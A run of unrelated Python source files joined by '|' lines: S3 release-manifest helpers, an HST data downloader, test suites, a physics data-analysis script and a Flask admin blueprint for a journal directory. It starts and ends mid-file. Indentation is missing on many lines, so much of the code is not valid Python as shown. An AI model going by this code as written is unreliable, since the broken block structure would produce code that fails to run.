return s3_client.upload_fileobj(
Fileobj=manifest_set_fobj,
Bucket=bucket_name,
Key=key,
ExtraArgs={
'ContentType': 'text/yaml',
'ContentEncoding': 'utf-8',
},
)
def enumerate_releases(
s3_client: 'botocore.client.S3',
bucket_name: str,
prefix: str=glci.model.ReleaseManifest.manifest_key_prefix,
) -> typing.Generator[glci.model.ReleaseManifest, None, None]:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=64)
_release_manifest = functools.partial(
release_manifest,
s3_client=s3_client,
bucket_name=bucket_name,
)
continuation_token = None
while True:
ctoken_args = {'ContinuationToken': continuation_token} \
if continuation_token \
else {}
res = s3_client.list_objects_v2(
Bucket=bucket_name,
Prefix=prefix,
**ctoken_args,
)
if (key_count := res['KeyCount']) == 0:
return
is_truncated = bool(res['IsTruncated'])
continuation_token = res.get('NextContinuationToken')
print(f'found {key_count} release manifests')
def wrap_release_manifest(key):
return _release_manifest(key=key)
keys = [obj_dict['Key'] for obj_dict in res['Contents']]
yield from executor.map(wrap_release_manifest, keys)
if not is_truncated:
return
def find_release(
s3_client: 'botocore.client.S3',
bucket_name: str,
release_identifier: glci.model.ReleaseIdentifier,
prefix: str=glci.model.ReleaseManifest.manifest_key_prefix,
):
normalised = glci.model.normalised_release_identifier
release_manifest_key = release_identifier.canonical_release_manifest_key()
manifest = release_manifest(
s3_client=s3_client,
bucket_name=bucket_name,
key=release_manifest_key,
absent_ok=True,
)
if not manifest:
return None
if (found_ri := normalised(manifest.release_identifier())) \
== (searched_ri := normalised(release_identifier)):
return manifest
else:
# warn about not matching expected contents from canonical name
print(f'WARNING: {release_manifest_key=} contained unexpected contents:')
print('this is the release-identifier we searched for:')
pprint.pprint(dataclasses.asdict(searched_ri))
print('this is the release-identifier we found:')
pprint.pprint(dataclasses.asdict(found_ri))
return None
def find_releases(
s3_client: 'botocore.client.S3',
bucket_name: str,
flavour_set: glci.model.GardenlinuxFlavourSet,
build_committish: str,
version: str,
gardenlinux_epoch: int,
prefix: str=glci.model.ReleaseManifest.manifest_key_prefix,
):
flavours = set(flavour_set.flavours())
for flavour in flavours:
release_identifier = glci.model.ReleaseIdentifier(
build_committish=build_committish,
version=version,
gardenlinux_epoch=gardenlinux_epoch,
architecture=flavour.architecture,
platform=flavour.platform,
modifiers=flavour.modifiers,
)
existing_release = find_release(
s3_client=s3_client,
bucket_name=bucket_name,
release_identifier=release_identifier,
prefix=prefix,
)
if existing_release:
yield existing_release
def release_set_manifest_name(
build_committish: str,
gardenlinux_epoch: int,
version: str,
flavourset_name: str,
build_type: glci.model.BuildType,
):
BT = glci.model.BuildType
if build_type in (BT.SNAPSHOT, BT.DAILY):
return f'{gardenlinux_epoch}-{build_committish[:6]}-{flavourset_name}'
    elif build_type is BT.RELEASE:
        return f'{version}-{flavourset_name}'
    else:
        raise ValueError(f'unsupported build type: {build_type=}')
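# Resulting names, with made-up values for illustration:
#   snapshot/daily: '<epoch>-<commit[:6]>-<flavourset>', e.g. '576-0abc12-all'
#   release:        '<version>-<flavourset>',            e.g. '27.0.0-all'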
def enumerate_release_sets(
s3_client: 'botocore.client.S3',
bucket_name: str,
prefix: str=glci.model.ReleaseManifestSet.release_manifest_set_prefix,
) -> typing.Generator[glci.model.ReleaseManifestSet, None, None]:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=64)
_release_manifest_set = functools.partial(
release_manifest_set,
s3_client=s3_client,
bucket_name=bucket_name,
)
continuation_token = None
while True:
ctoken_args = {'ContinuationToken': continuation_token} \
if continuation_token \
else {}
res = s3_client.list_objects_v2(
Bucket=bucket_name,
Prefix=prefix,
**ctoken_args,
)
if (key_count := res['KeyCount']) == 0:
return
is_truncated = bool(res['IsTruncated'])
continuation_token = res.get('NextContinuationToken')
        print(f'found {key_count} release manifest sets')
keys = [
key for obj_dict in res['Contents']
# filter out directories
if s3_client.head_object(
Bucket=bucket_name,
Key=(key := obj_dict['Key']),
)['ContentType'] != 'application/x-directory'
]
def wrap_release_manifest_set(key):
return _release_manifest_set(manifest_key=key)
yield from executor.map(wrap_release_manifest_set, keys)
if not is_truncated:
return
def find_release_set(
s3_client: 'botocore.client.S3',
bucket_name: str,
flavourset_name: str,
build_committish: str,
gardenlinux_epoch: int,
version: str,
build_type: glci.model.BuildType,
prefix: str=glci.model.ReleaseManifestSet.release_manifest_set_prefix,
absent_ok=False,
) -> glci.model.ReleaseManifestSet:
build_type = glci.model.BuildType(build_type)
manifest_key = os.path.join(
prefix,
build_type.value,
release_set_manifest_name(
build_committish=build_committish,
gardenlinux_epoch=gardenlinux_epoch,
version=version,
flavourset_name=flavourset_name,
build_type=build_type,
),
)
print(manifest_key)
manifest = release_manifest_set(
s3_client=s3_client,
bucket_name=bucket_name,
manifest_key=manifest_key,
absent_ok=absent_ok,
)
return manifest
@functools.lru_cache
def preconfigured(
func: callable,
cicd_cfg: glci.model.CicdCfg=cicd_cfg(),
):
# depends on `gardener-cicd-base`
try:
import ccc.aws
except ModuleNotFoundError:
raise RuntimeError('missing dependency: install gardener-cicd-base')
s3_session = ccc.aws.session(cicd_cfg.build.aws_cfg_name)
s3_client = s3_session.client('s3')
return functools.partial(
func,
s3_client=s3_client,
bucket_name=cicd_cfg.build.s3_bucket_name,
)
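# Usage sketch (assumes `gardener-cicd-base` is installed and the default
# CicdCfg points at a reachable bucket):
#
#   enumerate_fn = preconfigured(enumerate_releases)
#   for manifest in enumerate_fn():
#       print(manifest.s3_key)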
class EnumValueYamlDumper(yaml.SafeDumper):
'''
a yaml.SafeDumper that will dump enum objects using their values
'''
def represent_data(self, data):
if isinstance(data, enum.Enum):
return self.represent_data(data.value)
return super().represent_data(data)
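# Usage sketch: serialise data that still contains enum members (names are
# illustrative):
#
#   yaml.dump(dataclasses.asdict(manifest), stream, Dumper=EnumValueYamlDumper)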
|
#!/usr/bin/env python3
from astroquery.mast import Observations
import IPython
import boto3
from s3_query import find_product_in_s3
Observations.enable_s3_hst_dataset()
obs = Observations.query_criteria(
dataproduct_type=['image'],
project='HST',
instrument_name='ACS/WFC',
filters='F555W',
calib_level=3,
)
print("Observations: ", len(obs))
products = Observations.get_product_list(obs)
print("Products: ", len(products))
filtered_products = Observations.filter_products(
products,
productType='SCIENCE',
extension='fits',
description='DADS FLT file - Calibrated exposure ACS/WFC3/STIS/COS',
)
print("Filtered products: ", len(filtered_products))
print()
s3 = boto3.resource('s3')
for prod in filtered_products:
(key, head) = find_product_in_s3(prod)
filename = key.split('/').pop()
print("Downloading ", filename)
s3.Bucket("stpubdata").download_file(
key, filename,
{'RequestPayer':'requester'}
)
|
# Copyright (c) 2020 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Traffic scripts argument parser library."""
import argparse
class TrafficScriptArg:
"""Traffic scripts argument parser.
    Parse arguments for a traffic script. By default there are two arguments,
    '--tx_if' and '--rx_if'; more can be provided. All argument values are
    string representations. Optional arguments may also be added; their
    default value is the empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u"--tx_if", help=u"interface that sends traffic")
parser.add_argument(u"--rx_if", help=u"interface that receives traffic")
if more_args is not None:
for arg in more_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name, nargs=u"?", default=u"")
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
|
from cc import LuaException, import_file, fs, settings
_lib = import_file('_lib.py', __file__)
step, assert_raises = _lib.step, _lib.assert_raises
assert _lib.get_class_table(settings) == _lib.get_object_table('settings')
step('Settings will be cleared')
assert settings.clear() is None
# names are not empty, there are system settings
assert isinstance(settings.getNames(), list)
assert settings.define('test.a') is None
assert settings.define('test.b', description='b') is None
assert settings.define('test.c', type='string') is None
assert settings.define('test.d', default=42) is None
assert settings.getDetails('test.a') == {
'changed': False,
}
assert settings.getDetails('test.b') == {
'changed': False,
'description': 'b',
}
assert settings.getDetails('test.c') == {
'changed': False,
'type': 'string',
}
assert settings.getDetails('test.d') == {
'changed': False,
'default': 42,
'value': 42,
}
# redefining
assert settings.define('test.a', type='number', default=11) is None
assert settings.getDetails('test.a') == {
'changed': False,
'type': 'number',
'default': 11,
'value': 11,
}
assert settings.get('test.a') == 11
assert settings.set('test.a', 12) is None
assert settings.get('test.a') == 12
with assert_raises(LuaException):
settings.set('test.a', b'text')
assert settings.get('test.a') == 12
assert settings.unset('test.a') is None
assert settings.get('test.a') == 11
assert settings.set('test.c', b'hello') is None
assert {'test.a', 'test.b', 'test.c', 'test.d'}.issubset(set(settings.getNames()))
assert settings.undefine('test.a') is None
assert settings.undefine('test.b') is None
assert settings.undefine('test.c') is None
assert settings.undefine('test.d') is None
assert 'test.c' in settings.getNames()
assert settings.get('test.c') == b'hello'
assert settings.getDetails('test.c') == {
'changed': True,
'value': b'hello',
}
assert settings.unset('test.c') is None
assert settings.get('test.c') is None
assert settings.getDetails('test.c') == {
'changed': False,
}
assert {'test.a', 'test.b', 'test.c', 'test.d'} & set(settings.getNames()) == set()
assert settings.set('test.e', [9, b'text', False]) is None
assert settings.get('test.e') == {1: 9, 2: b'text', 3: False}
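# (Lua represents sequences as 1-indexed tables, so the list round-trips back
# as a dict keyed by 1..3.)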
assert settings.clear() is None
assert settings.get('test.e') is None
fs.delete('.settings')
assert settings.load() is False
assert settings.save() is True
assert settings.load() is True
fs.delete('.settings')
assert settings.set('key', 84) is None
assert settings.save('sfile') is True
assert settings.load('sfile') is True
fs.delete('sfile')
print('Test finished successfully')
|
"""
Code for performing data analysis for State Preparation A tests that were performed
using the EMCCD camera in late 2021.
"""
from pathlib import Path
from typing import Union
import lmfit
import matplotlib.pyplot as plt
import numpy as np
from data_analysis import analyzers
from data_analysis import background_subtractors as BG_subtract
from data_analysis import (
bootstrapping,
cutters,
plotters,
preprocessors,
retrievers,
signal_calculators,
)
def analyze_SPA_dataset(
filepath: Union[Path, str],
run_name: Union[str, int],
background_run_name: Union[str, int],
scan_param_name: str,
scan_param_new_name: str,
switch_name: str = None,
n_bs: int = 6,
):
"""
Analyzes an SPA dataset
"""
##### Retrieving data from file #####
# Initialize data retriever
SPA_retriever = retrievers.SPARetriever()
# Print datasets in data
# SPA_retriever.print_run_names(filepath)
    if isinstance(run_name, int):
run_name = SPA_retriever.get_run_names(filepath)[run_name]
# Retrieve data
df = SPA_retriever.retrieve_data(
filepath,
run_name,
scan_param=scan_param_name,
scan_param_new_name=scan_param_new_name,
)
##### Processing data #####
# Define preprocessors
processors = [
preprocessors.NormalizedAbsorption(),
preprocessors.IntegratedAbsorption(),
preprocessors.AbsorptionBigEnough(),
preprocessors.YAGFired(),
preprocessors.AbsorptionON(),
preprocessors.RotCoolON(),
preprocessors.RCShutterOpen(),
preprocessors.CamDAQTimeDiff(),
preprocessors.MicrowavesON(),
]
# Define plotters that will be run after the preprocessing
plotters_list = [plotters.PreProcessorPlotter()]
# Define the data processing pipeline
processor_pipeline = preprocessors.ProcessorPipeline(
processors, plotters=plotters_list
)
# Pre-process the data
processor_pipeline.process_data(df, plot=False)
##### Cutting data #####
# Define cutters
cutters_list = [
cutters.YAGFiredCutter(),
cutters.AbsorptionONCutter(),
cutters.AbsBigEnoughCutter(),
cutters.TimingCutter(),
]
# Define cutter pipeline
cutter_pipeline = cutters.CutterPipeline(cutters_list)
# Apply cuts
cutter_pipeline.apply_cuts(df, print_result=True)
##### Analyze preprocessed data #####
# Define a background subtractor
df_background = SPA_retriever.retrieve_data(filepath, background_run_name)
background_subtractor = BG_subtract.AcquiredBackgroundSubtractor(df_background)
# Define a signal size calculator
init_params = lmfit.Parameters()
init_params.add("A", value=10, min=0)
init_params.add("center_x", value=200, min=0, max=512) # , vary = False)
init_params.add("center_y", value=250, min=0, max=512) # , vary = False)
init_params.add("phi", value=0, min=0, max=np.pi / 4)
init_params.add("sigma_x", value=16, min=10, max=100)
init_params.add("sigma_y", value=30, min=10, max=100)
init_params.add("C", value=0)
    # plotter=GaussianFitPlotter() can optionally be passed to visualise the fit
    signal_size_calculator = signal_calculators.SignalFromGaussianFit(
        init_params=init_params, ROI=np.s_[150:450, 100:300]
    )
# Define an analyzer
analyzers_list = [
analyzers.FluorescenceImageAnalyzer(
background_subtractor, signal_size_calculator
)
]
# Define a parameter scan analyzer
if switch_name:
scan_analyzer = analyzers.SwitchingParamScanAnalyzer(
scan_param_new_name,
switch_name,
analyzers_list,
# plotter = SwitchingParamScanPlotter()
)
else:
scan_analyzer = analyzers.ParamScanAnalyzer(
scan_param_new_name,
analyzers_list,
# plotter = ParamScanPlotter()
)
# Run parameter scan analysis using bootstrap
if switch_name:
bs_plotter = plotters.SwitchingParamScanPlotterBS(switch_name)
else:
bs_plotter = plotters.ParamScanPlotterBS()
bootstrapper = bootstrapping.Bootstrapper(scan_analyzer, plotter=bs_plotter)
bootstrapper.bootstrap(df, n_bs=n_bs, n_jobs=5)
df_bootstrap = bootstrapper.df_bootstrap
bootstrapper.aggregate(scan_param=scan_param_new_name)
df_agg = bootstrapper.df_agg
# Save the analyzed data
# Bootstrapped data for distributions
    # raw strings avoid the invalid '\M', '\A' etc. escape sequences that the
    # original f-strings relied on
    analyzed_dir = Path(
        r"G:\My Drive\CeNTREX Oskari\State preparation\SPA\Data analysis"
        r"\Analyzed Data"
    )
    bs_save_path = analyzed_dir / f"{filepath.parts[-1][:-4]}_bootstrap.hdf"
    df_bootstrap.to_hdf(bs_save_path, key=run_name, mode="a")
print("Saved bootstrapped results to:")
print(bs_save_path)
# Aggregated data for final results
    agg_save_path = analyzed_dir / f"{filepath.parts[-1][:-4]}_analyzed.hdf"
    df_agg.to_hdf(agg_save_path, key=run_name, mode="a")
print("\nSaved aggregated results to:")
print(agg_save_path)
print("\nRun name:")
print(run_name)
if __name__ == "__main__":
# Define path to data
    DATA_DIR = Path(
        r"D:\Google Drive\CeNTREX Oskari\State preparation\SPA\Data analysis\Data"
    )
DATA_FNAME = Path("SPA_test_11_9_2021.hdf")
filepath = DATA_DIR / DATA_FNAME
# Define scan parameter name
scan_param_name = "SynthHD Pro SPA SetFrequencyCHAGUI"
scan_param_new_name = "SPAJ01Frequency"
# Run the script
analyze_SPA_dataset(
filepath, 6, 0, scan_param_name, scan_param_new_name, switch_name="MicrowavesON"
)
|
"""something_something_DVD_subgoal dataset."""
from .something_something_DVD_subgoal import SomethingSomethingDvdSubgoal
|
class Channel(object):
def __init__(self, name, topic):
self.name = name
self.topic = topic
# the puzzle that is giving this channel its name, either
# via a correct or incorrect solution
self.puzzle = None
# previous channel (if there is one)
self.prev = None
# next channel (the one you'll get to if you solve the clue
# in this channels topic)
self.next = None
        # other channels reached via incorrect solutions
        self.next_incorrect = []
def __str__(self):
name_puzzle = self.puzzle.name if self.puzzle else '-'
topic_puzzle = self.get_topic_puzzle().name if self.get_topic_puzzle() else '-'
return '<Channel %s [topic:%s] [name_puzzle:%s topic_puzzle:%s]>' % (self.name, self.topic, name_puzzle, topic_puzzle)
def get_topic_puzzle(self):
"""The puzzle that is giving this channel its topic."""
return self.next.puzzle if self.next else None
|
import unittest
import json
import pickle
from moto import mock_s3
import boto3
import pandas as pd
from tagr.tagging.artifacts import Tagr
from tagr.storage.aws import Aws
DATA = [{"a": 1, "b": 2, "c": 3}, {"a": 10, "b": 20, "c": 30}]
DF = pd.DataFrame(DATA)
EXPERIMENT_PARAMS = {
"proj": "unit-test-project",
"experiment": "unit_test_expr",
"tag": "unit_test_tag",
}
@mock_s3
class FlushTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
self.tag = Tagr()
self.tag.storage_provider = Aws()
super().__init__(*args, **kwargs)
@staticmethod
def create_connection():
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket=EXPERIMENT_PARAMS["proj"])
return conn
def test_flush(self):
# Arrange
expected_result = {"test_key": "test_val"}
conn = self.create_connection()
# Act
self.tag.save({"test_key": "test_val"}, "dict1", "other")
self.tag.flush(
proj=EXPERIMENT_PARAMS["proj"],
experiment=EXPERIMENT_PARAMS["experiment"],
tag=EXPERIMENT_PARAMS["tag"],
storage="aws",
)
dict_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/dict1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
dict_content = pickle.loads(dict_file)
# Assert
self.assertEqual(expected_result, dict_content)
def test_get_primitive_objs_dict(self):
expected_result = {"str1": "a", "int1": 1, "float1": 2.0}
self.tag.save("a", "str1", "primitive")
self.tag.save(1, "int1", "primitive")
self.tag.save(2.0, "float1", "primitive")
self.tag.save(DF, "df1", "dataframe")
summary = self.tag.summary()
primitive_objs_dict = self.tag._get_primitive_objs_dict(summary)
self.assertEqual(expected_result, primitive_objs_dict)
def test_flush_metadata_json(self):
expected_result = {
"types": {"df1": dict(zip(DF.columns, DF.dtypes.map(lambda x: x.name)))},
"stats": {"df1": DF.describe().to_dict()},
"primitive_objs": {"float1": 2.0, "int1": 1, "str1": "a"},
}
conn = self.create_connection()
self.tag.save("a", "str1", "primitive")
self.tag.save(1, "int1", "primitive")
self.tag.save(2.0, "float1", "primitive")
self.tag.save(DF, "df1", "dataframe")
summary = self.tag.summary()
# flush dfs to gen metadata
self.tag._flush_dfs(summary, EXPERIMENT_PARAMS)
self.tag._flush_metadata_json(summary, EXPERIMENT_PARAMS)
res = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/df_summary.json".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
.decode("utf-8")
)
json_content = json.loads(res)
self.assertEqual(expected_result, json_content)
def test_flush_dfs(self):
expected_result = DF
conn = self.create_connection()
self.tag.save(DF, "df1", "dataframe")
summary = self.tag.summary()
self.tag._flush_dfs(summary, EXPERIMENT_PARAMS)
res = conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/df1.csv".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
).get()["Body"]
df_content = pd.read_csv(res, index_col=0)
        pd.testing.assert_frame_equal(expected_result, df_content)
def test_flush_non_dfs(self):
# Arrange
expected_result_str = "a"
expected_result_int = 1
expected_result_dict = {"test_key": "test_val"}
conn = self.create_connection()
# Act
self.tag.save("a", "str1", "primitive")
self.tag.save(1, "int1", "primitive")
self.tag.save({"test_key": "test_val"}, "dict1", "other")
summary = self.tag.summary()
self.tag._flush_non_dfs(summary, EXPERIMENT_PARAMS)
str_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/str1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
str_content = pickle.loads(str_file)
int_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/int1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
int_content = pickle.loads(int_file)
dict_file = (
conn.Object(
EXPERIMENT_PARAMS["proj"],
"{}/{}/dict1.pkl".format(
EXPERIMENT_PARAMS["experiment"], EXPERIMENT_PARAMS["tag"]
),
)
.get()["Body"]
.read()
)
dict_content = pickle.loads(dict_file)
# Assert
self.assertEqual(expected_result_str, str_content)
self.assertEqual(expected_result_int, int_content)
self.assertEqual(expected_result_dict, dict_content)
|
import json
from flask import Blueprint, request, flash, abort, make_response
from flask import render_template, redirect, url_for
from flask_login import current_user, login_required
from werkzeug.datastructures import MultiDict
from portality.bll.exceptions import ArticleMergeConflict, DuplicateArticleException
from portality.decorators import ssl_required, restrict_to_role, write_required
import portality.models as models
from portality.formcontext import choices
from portality import lock, app_email
from portality.lib.es_query_http import remove_search_limits
from portality.util import flash_with_url, jsonp, make_json_resp, get_web_json_payload, validate_json
from portality.core import app
from portality.tasks import journal_in_out_doaj, journal_bulk_edit, suggestion_bulk_edit, journal_bulk_delete, article_bulk_delete
from portality.bll import DOAJ, exceptions
from portality.lcc import lcc_jstree
# from portality.formcontext import emails
import portality.notifications.application_emails as emails
from portality.ui.messages import Messages
from portality.formcontext import formcontext
from portality.view.forms import EditorGroupForm, MakeContinuation
from portality.forms.application_forms import ApplicationFormFactory
from portality.background import BackgroundSummary
from portality import constants
from portality.forms.application_forms import JournalFormFactory
from portality.crosswalks.application_form import ApplicationFormXWalk
blueprint = Blueprint('admin', __name__)
# restrict everything in admin to logged in users with the "admin" role
@blueprint.before_request
def restrict():
return restrict_to_role('admin')
# build an admin page where things can be done
@blueprint.route('/')
@login_required
@ssl_required
def index():
return render_template('admin/index.html', admin_page=True)
@blueprint.route("/journals", methods=["GET"])
@login_required
@ssl_required
def journals():
qs = request.query_string
target = url_for("admin.index")
if qs:
target += "?" + qs.decode()
return redirect(target)
@blueprint.route("/journals", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def journals_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
        except Exception:
app.logger.warn("Bad Request at admin/journals: " + str(request.values.get("q")))
abort(400)
# get the total number of journals to be affected
jtotal = models.Journal.hit_count(query, consistent_order=False)
# get the total number of articles to be affected
issns = models.Journal.issns_by_query(query)
atotal = models.Article.count_by_issns(issns)
resp = make_response(json.dumps({"journals" : jtotal, "articles" : atotal}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
        except Exception:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Journal.delete_selected(query=query, articles=True, snapshot_journals=True, snapshot_articles=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/articles", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def articles_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
        except Exception:
            app.logger.warn("Bad Request at admin/articles: " + str(request.values.get("q")))
            abort(400)
total = models.Article.hit_count(query, consistent_order=False)
resp = make_response(json.dumps({"total" : total}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
        except Exception:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Article.delete_selected(query=query, snapshot=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/delete/article/<article_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def article_endpoint(article_id):
if not current_user.has_role("delete_article"):
abort(401)
a = models.Article.pull(article_id)
if a is None:
abort(404)
delete = request.values.get("delete", "false")
if delete != "true":
abort(400)
a.snapshot()
a.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/article/<article_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def article_page(article_id):
if not current_user.has_role("edit_article"):
abort(401)
ap = models.Article.pull(article_id)
if ap is None:
abort(404)
fc = formcontext.ArticleFormFactory.get_from_context(role="admin", source=ap, user=current_user)
if request.method == "GET":
return fc.render_template()
elif request.method == "POST":
user = current_user._get_current_object()
fc = formcontext.ArticleFormFactory.get_from_context(role="admin", source=ap, user=user, form_data=request.form)
fc.modify_authors_if_required(request.values)
if fc.validate():
try:
fc.finalise()
except ArticleMergeConflict:
Messages.flash(Messages.ARTICLE_METADATA_MERGE_CONFLICT)
except DuplicateArticleException:
Messages.flash(Messages.ARTICLE_METADATA_UPDATE_CONFLICT)
return fc.render_template()
@blueprint.route("/journal/<journal_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_page(journal_id):
auth_svc = DOAJ.authorisationService()
journal_svc = DOAJ.journalService()
journal, _ = journal_svc.journal(journal_id)
if journal is None:
abort(404)
try:
auth_svc.can_edit_journal(current_user._get_current_object(), journal)
except exceptions.AuthoriseException:
abort(401)
# attempt to get a lock on the object
try:
lockinfo = lock.lock(constants.LOCK_JOURNAL, journal_id, current_user.id)
except lock.Locked as l:
return render_template("admin/journal_locked.html", journal=journal, lock=l.lock)
fc = JournalFormFactory.context("admin")
if request.method == "GET":
job = None
job_id = request.values.get("job")
if job_id is not None and job_id != "":
job = models.BackgroundJob.pull(job_id)
flash("Job to withdraw/reinstate journal has been submitted")
fc.processor(source=journal)
return fc.render_template(lock=lockinfo, job=job, obj=journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=journal)
if processor.validate():
try:
processor.finalise()
flash('Journal updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='cannot_edit'))
else:
return fc.render_template(lock=lockinfo, obj=journal, lcc_tree=lcc_jstree)
######################################################
# Endpoints for reinstating/withdrawing journals from the DOAJ
#
@blueprint.route("/journal/<journal_id>/activate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_activate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], True)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journal/<journal_id>/deactivate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_deactivate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], False)
return redirect(url_for('.journal_page', journal_id=journal_id, job=job.id))
@blueprint.route("/journals/bulk/withdraw", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_withdraw():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, False, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/reinstate", methods=["POST"])
@login_required
@ssl_required
@write_required()
def journals_bulk_reinstate():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_in_out_doaj.change_by_query(q, True, dry_run=payload.get("dry_run", True))
return make_json_resp(summary.as_dict(), status_code=200)
#
#####################################################################
@blueprint.route("/journal/<journal_id>/continue", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_continue(journal_id):
j = models.Journal.pull(journal_id)
if j is None:
abort(404)
if request.method == "GET":
type = request.values.get("type")
form = MakeContinuation()
form.type.data = type
return render_template("admin/continuation.html", form=form, current=j)
elif request.method == "POST":
form = MakeContinuation(request.form)
if not form.validate():
return render_template('admin/continuation.html', form=form, current=j)
if form.type.data is None:
abort(400)
if form.type.data not in ["replaces", "is_replaced_by"]:
abort(400)
try:
cont = j.make_continuation(form.type.data, eissn=form.eissn.data, pissn=form.pissn.data, title=form.title.data)
        except Exception:
abort(400)
flash("The continuation has been created (see below). You may now edit the other metadata associated with it. The original journal has also been updated with this continuation's ISSN(s). Once you are happy with this record, you can publish it to the DOAJ", "success")
return redirect(url_for('.journal_page', journal_id=cont.id))
@blueprint.route("/applications", methods=["GET"])
@login_required
@ssl_required
def suggestions():
return render_template("admin/applications.html",
admin_page=True,
application_status_choices=choices.Choices.application_status("admin"))
@blueprint.route("/application/<application_id>", methods=["GET", "POST"])
@write_required()
@login_required
@ssl_required
def application(application_id):
auth_svc = DOAJ.authorisationService()
application_svc = DOAJ.applicationService()
ap, _ = application_svc.application(application_id)
if ap is None:
abort(404)
try:
auth_svc.can_edit_application(current_user._get_current_object(), ap)
except exceptions.AuthoriseException:
abort(401)
try:
lockinfo = lock.lock(constants.LOCK_APPLICATION, application_id, current_user.id)
except lock.Locked as l:
return render_template("admin/application_locked.html", application=ap, lock=l.lock)
fc = ApplicationFormFactory.context("admin")
form_diff, current_journal = ApplicationFormXWalk.update_request_diff(ap)
if request.method == "GET":
fc.processor(source=ap)
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff, current_journal=current_journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=ap)
if processor.validate():
try:
processor.finalise(current_user._get_current_object())
flash('Application updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.application", application_id=ap.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.application", application_id=ap.id, _anchor='cannot_edit'))
else:
return fc.render_template(obj=ap, lock=lockinfo, form_diff=form_diff, current_journal=current_journal, lcc_tree=lcc_jstree)
@blueprint.route("/application_quick_reject/<application_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def application_quick_reject(application_id):
# extract the note information from the request
canned_reason = request.values.get("quick_reject", "")
